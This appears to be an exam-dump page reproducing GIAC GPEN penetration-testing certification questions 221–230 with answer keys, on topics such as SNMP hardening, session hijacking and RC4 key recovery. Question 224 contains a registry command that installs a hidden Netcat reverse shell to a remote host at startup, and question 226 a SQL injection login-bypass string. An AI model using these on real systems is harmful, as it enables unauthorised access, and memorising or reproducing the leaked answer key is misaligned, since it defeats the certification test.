[Free] 2017(Sep) CollectDumps Dumpsleader GIAC GPEN Dumps with VCE and PDF 221-230


GIAC Penetration Tester

Question No: 221 – (Topic 3)

You work as a Penetration Tester for Infosec Inc. Your company takes on security auditing projects. Recently, your company has assigned you a project to test the security of the we-are-secure.com network. Having finished your penetration testing, you find that the we-are-secure.com server is highly vulnerable to SNMP enumeration. You advise We-are-secure Inc. to turn off SNMP; however, this is not possible as the company is using various SNMP services on its remote nodes. What other steps can you suggest to remove the SNMP vulnerability?

Each correct answer represents a complete solution. Choose two.

  A. Change the default community string names.

  B. Install antivirus.

  C. Close port TCP 53.

  D. Upgrade SNMP Version 1 with the latest version.

Answer: A,D

Question No: 222 – (Topic 3)

You want to retrieve password files (stored in the Web server's index directory) from various Web sites. Which of the following tools can you use to accomplish the task?

  A. Nmap

  B. Sam Spade

  C. Whois

  D. Google

Answer: D

Question No: 223 – (Topic 3)

Which of the following laws or acts, formed in Australia, enforces prohibition against cyber stalking?

  A. Stalking Amendment Act (1999)

  B. Malicious Communications Act (1998)

  C. Anti-Cyber-Stalking law (1999)

  D. Stalking by Electronic Communications Act (2001)

Answer: A

Question No: 224 – (Topic 3)

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"

What task do you want to perform by running this command?

Each correct answer represents a complete solution. Choose all that apply.

  A. You want to put Netcat in the stealth mode.

  B. You want to add the Netcat command to the Windows registry.

  C. You want to perform banner grabbing.

  D. You want to set the Netcat to execute command any time.

Answer: A,B,D

Question No: 225 – (Topic 3)

One of the sales people in your company complains that sometimes he gets a lot of unsolicited messages on his PDA. After asking a few questions, you determine that the issue only occurs in crowded areas like airports. What is the most likely problem?

  A. Bluesnarfing

  B. Bluejacking

  C. A virus

  D. Spam

Answer: B

Question No: 226 – (Topic 3)

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. On the We-are-secure login page, he enters ='or''=' as a username and successfully logs in to the user page of the Web site. The We-are-secure login page is vulnerable to a __________.

  A. Replay attack

  B. Land attack

  C. SQL injection attack

  D. Dictionary attack

Answer: C

Question No: 227 – (Topic 3)

Which of the following tools automates password guessing in the NetBIOS session?

  A. L0phtCrack

  B. John the Ripper

  C. Legion

  D. NTInfoScan

Answer: C

Question No: 228 – (Topic 3)

Which of the following attacks allows an attacker to recover the key in an RC4 encrypted stream from a large number of messages in that stream?

  A. SYN flood attack

  B. Rainbow attack

  C. Zero Day attack

  D. FMS attack

Answer: D

Question No: 229 – (Topic 3)

Which of the following statements are true about session hijacking?

Each correct answer represents a complete solution. Choose all that apply.

  A. It is used to slow the working of victim's network resources.

  B. TCP session hijacking is when a hacker takes over a TCP session between two machines.

  C. Use of a long random number or string as the session key reduces session hijacking.

  D. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

Answer: B,C,D

Question No: 230 – (Topic 3)

Which of the following statements are true about session hijacking?

Each correct answer represents a complete solution. Choose all that apply.

  A. TCP session hijacking is when a hacker takes over a TCP session between two machines.

  B. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

  C. Use of a long random number or string as the session key reduces session hijacking.

  D. It is used to slow the working of victim's network resources.

Answer: A,B,C
